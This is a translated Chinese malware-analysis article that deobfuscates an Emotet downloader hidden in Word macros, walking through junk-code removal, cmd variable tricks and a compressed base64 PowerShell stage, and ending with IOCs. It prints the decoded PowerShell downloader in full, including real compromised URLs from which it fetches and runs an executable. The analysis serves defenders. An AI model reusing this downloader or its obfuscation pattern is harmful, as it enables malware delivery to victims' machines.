被植入恶意代码的Emotet Downloader细节分析

鲁班七号 技术 2018年6月22日发布

导语:我已经对Emotet Downloader进行了剖析,它使用宏和Powershell命令从受攻击的网站下载Emotet。最近他们已经修改了下载器的工作方式,并且已经被上传到了VirusBay。本文我们将对其进行分析!

我已经对Emotet Downloader进行了剖析,它使用宏和Powershell命令从受攻击的网站下载Emotet。最近他们已经修改了下载器的工作方式,并且已经被上传到了VirusBay。下面我们对其进行分析!

MD5哈希值:53ea2608f0e34e3e746801977b778305

如下图所示(右侧是新样本,左侧是旧样本),新旧两个文档有一些相似之处,他们均通过呈现一个旧版本的Microsoft Office创建的文档,谎称出现错误,并且为了查看错误受害者需要点击Enable Content(启用内容)。这一操作看起来似乎是合法的,那么让我们看看当点击了Enable Content时会运行什么程序。

当打开Macro部分时,出现两个宏,其中包含几个函数/子例程。首先查看的是autoopen()或auto_open(),因为该操作是单击“Enable Content”时被执行的。

还有对Sqr()的调用,它计算一个数字的平方根并将得出的值返回,我们稍后会对其分析。首先,我们将这些宏提取到一个文本文件中,这样可以更容易地对其进行处理。

由于纯文本的dropper(恶意应用输出程序)和downloader(恶意应用下载程序)因包含垃圾代码而臭名昭著,所以每当声明一个变量时,我都会检查该变量是否存在于宏的其他地方。“On Error Resume Next”说明文档中含有垃圾代码,它的基本意思是“如果提示错误,请忽略,继续进行下一步操作”。我首先检查了Hirfd和MLiDY是否同时存在于包含宏的两个文件中,结果不是。因此我假设该变量在整个恶意攻击过程中不是必需的,如果将剩下的部分除去混

淆后出现任何错误,我将不得不返回去分析剩下的部分。一旦我们忽略了垃圾代码并添加了一些评论,我们会得到如下结果:

因此,autoopen()只负责执行函数vwncz(),这是第一个宏中的另一个函数。

表面上看,这个函数中的垃圾代码似乎包含了CStr(),就像autoopen()一样,因此如果删除了这些行就会得到了如下:

可以认为这些值(wHjAK()、rDRYBhb()…)是函数,因为如果将它们与第二个宏交叉引用,它们则会被声明为函数。由此可知第二个宏;的目的是形成字符串。Shell()出现在字符串的开头,它可以在机器上执行文件。第一个参数中的第一个字母是“C”,因此我们可以猜测这与cmd有关。字符串末尾的0可以将程序从用户中隐藏——它基本上是vbHide,而不是它的数值。现在我们已经完全去除了第一个宏的混淆,下面继续对下一个宏去除混淆。

查看第一个宏中shell执行的字符串,wHjAK()是第一个被调用的,所以我们从该函数开始。将这两个文件进行比较,这两个文件都有CStr,因此可以假设任何带有CStr的字符串都是垃圾代码。去除所有带有CStr的字符串后,我们得到以下结果:

从外观上看,因为wHjAK是一个函数它会返回一个值,最后的字符串存储在wHjAK中,通过将所有的字符串添加在一起可以得到最终的输出。只需启动一个Python Interpreter,并将不包含End Function以及On Error Resume Next以上的所有东西的代码粘贴到其中,这样就不用手动添加字符串。通过这些操作,只需输入print wHjAK就可获得最终的字符串。

虽然很难猜测如果没有剩下的部分代码,该命令可以做什么,可以认为这一部分代码正在声明不同的变量,并执行一个隐藏命令提示符- %^c^o^m^S^p^E^c^% 基本上指向命令提示符的路径。现在我们可以把函数缩小到如下:

这种垃圾代码“模式”在每个函数中都存在,因此对于第三个函数,当删除所有CStr字符串并将其传输到Python Interpreter时,得到如下:

函数二和函数三是这样的:

虽然也可以对剩下的函数进行这种操作,但是太浪费时间。一个简单的Python脚本可以删除所有带有CStr的字符串,并将其余的行写到一个文件中:

当在第二个宏文件上运行该脚本时,可以提取所有不包含CStr的字符串。但是,如果这样会出现一个问题,那就是文件中会包含不必要的行,例如On Error Resume Next,因此可以将If语句更改为如下所示:

if "CStr" not in lines and "End" not in lines and "Error" not in lines and "Function_" not in lines:

这样就只剩下变量了。现在可以将所有重要的行写到文件中,但是仍然需要自己形成最终的字符串。我们或许可以再把它自动化一些。首先,我们需要找到函数名,并将找到的函数名输出。获取了包含最终字符串的函数之后,将数据写到另一个文件——这次是一个Python File,我们可以执行它来获得完整的字符串。新的文件将找到完整的字符串并将其写到另一个文件中,这样我们就可以将其读入主程序的内存中,并将其存储在一个变量中。如果这一操作没有作用,可以在这里找到完整的脚本——它是一个输出最终解码字符串的完整脚本。见结尾!

总之,在运行形成最终字符串的脚本时,我们将它作为shell命令:

因此,首先,该命令正设置全局变量,然后执行一个base64编码的字符串。在对base64字符串进行解码后,我们得到如下输出:

乍一看,它看起来像shellcode——但它不是。每一个\x00在空字节后面都包含一个字母。如果我们删除所有的空字节,得到的脚本如下:

因此可以确认这实际上是一个Powershell脚本,但是它又是在哪里被调用的?如果回到原始命令并分析所设置的变量,文件末尾如下:

!%izXfwddfGKP%!!%vqJRNrOQqvMv%!!%BOuDbApmqzScN%!!%voYPuLNXjn%!!%MUtvjfFlzFFsL%!!%HEYjHOmzK%! -e

如果我们将该特定字符串中的每个变量解析为所声明的变量,得到如下:

!%izXfwddfGKP%! = !%fuqGUmOvI%! = p
!%vqJRNrOQqvMv%! = !%KXEhPKfZWWmaJ%! = o^w
!%BOuDbApmqzScN%! = e^r
!%voYPuLNXjn%! = s
!%MUtvjfFlzFFsL%! = he
!%HEYjHOmzK%! = ll
!%izXfwddfGKP%! !%vqJRNrOQqvMv%! !%BOuDbApmqzScN%! !%voYPuLNXjn%! !%MUtvjfFlzFFsL%! !%HEYjHOmzK%! = po^we^rshell = powershell

因此,通过使用变量声明,该downloader能够形成字符串“powershell”并执行编码的字符串。现在回到我们找到的powershell脚本。

( neW-ObJect io.compRessION.DEfLatEstreAm([IO.MEMORystream][SySTEm.CONvErT]::fRoMBASE64stRiNg( 'VZDtS8MwEMb/lXwodEOXOF/RImzOijpfJvVlG4Jk6Wni2qQkV9s69r8b3RT8cnB3v+ce7gn06Lz4vCTHREPVMbN3EEgs16nJoyC9HX2c3v3fJY1DyOkNIH2C2SBToDEKqpOLGD0YSsTiiDGeQ11TN2fT/cvJlPXW46qqqOSpspkq8xItOOSld0MqTM66DUoxHP7REniGspCNU8J9E5SXrNjqD+KHfxdz7synyrimSr8aNulfdfvyj3DzJgOegv05wW7PD5pdvc1CmhSZwlbYC9tR8Hgx7t8n/oFglQfVUGOru0n2D7s7ex7Qw0E8Kb8B0B9HPoGCbJDwOfT1V+x7CjWE0auxwIVsBdU4nt0Rpckqn/YCbbNYp0pPTaUzw9MzlcEapfcmQav0W6u9SdaW7ShBbrEzskaAc7/jaOY95tFScBRyUVmF0JHGIQleaFwLKFAZTa+9gr9BtFx+AQ=='), [iO.cOmpREssIOn.COMPrESsioNmODe]::DeCOMpReSs) | %{ neW-ObJect sYStEm.iO.StrEaMReADER( $_,[SYstEM.tExt.eNcOdInG]::AsCII) } ).rEadtOeND()|&((VAriABle '*mdr*').NAMe[3,11,2]-jOin'')

该脚本中嵌入了一个Base64字符串,它是从使用[System.Convert]::FromBase64String的Base64转换而来的。问题是,当我们尝试用Base64解码该字符串时,得到的是乱码。

原因是该字符串被压缩了。为了解压它,可以使用一个名为zlib的Python模块。使用zlib.decompress()将压缩数据作为参数传递,得到解压缩值,即:

上篇Emotet文章中介绍了下载脚本,在每个“;”后添加新的一行形成如下:

$nPHpzJ = new-object random;
$dOPvDQ = new-object System.Net.WebClient;$wBIEt = 'http://amexx.sk/Z6JYZ/@http://www.hadirliumutrestaurant.com/1ythcKK/@http://healthphysics.com.au/p0ACEU/@http://www.masozilan.info/YAL1Ah/@http://skyleaders.com/OH7y4n2/'.Split);
$VIXATS = $nPHpzJ.next(1, 69135);
$nKCEYu = $env:temp + '\' + $VIXATS + '.exe';
for each ($wXEbQ in $wBIEt) {
    try {
        $dOPvDQ.DownloadFile($wXEbQ.ToString(), $nKCEYu);
        Start-Process $nKCEYu;
        break;
    }
    catch {
        write-host $_.Exception.Message;
    }
}

简单的说,该脚本通过在1和69135之间随机选择一个数字创建一个随机的文件名,然后将它作为.exe存储在%TEMP%目录中。启动一个for循环,该循环遍历存储在$dOPvDQ中的每个URL。然后该脚本尝试从该站点下载一个文件,并将其存储在%TEMP%目录中。然后使用Start-Process执行该文件。在检查了所有站点是否会下载一个文件之后,我得出的结论是,网站所有者(因为这些站点是合法的,只是被攻击了)删除了托管在其web服务器上的Emotet可执行文件。

总结:

IOC:
哈希值(MD5): 
文件: 53ea2608f0e34e3e746801977b778305
宏 1: a7f490aaab202c5fd38c136371009685
宏 2: 1bed5b9266f5497e258638eca7344963

URL:
hxxp://amexx.sk/Z6JYZ/
hxxp://www.hadirliumutrestaurant.com/1ythcKK/
hxxp://healthphysics.com.au/p0ACEU/
hxxp://www.masozilan.info/YAL1Ah/
hxxp://skyleaders.com/OH7y4n2/

本文翻译自:http://t.cn/RBTV2pe如若转载,请注明原文地址: http://www.4hou.com/technology/12130.html
点赞 0
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论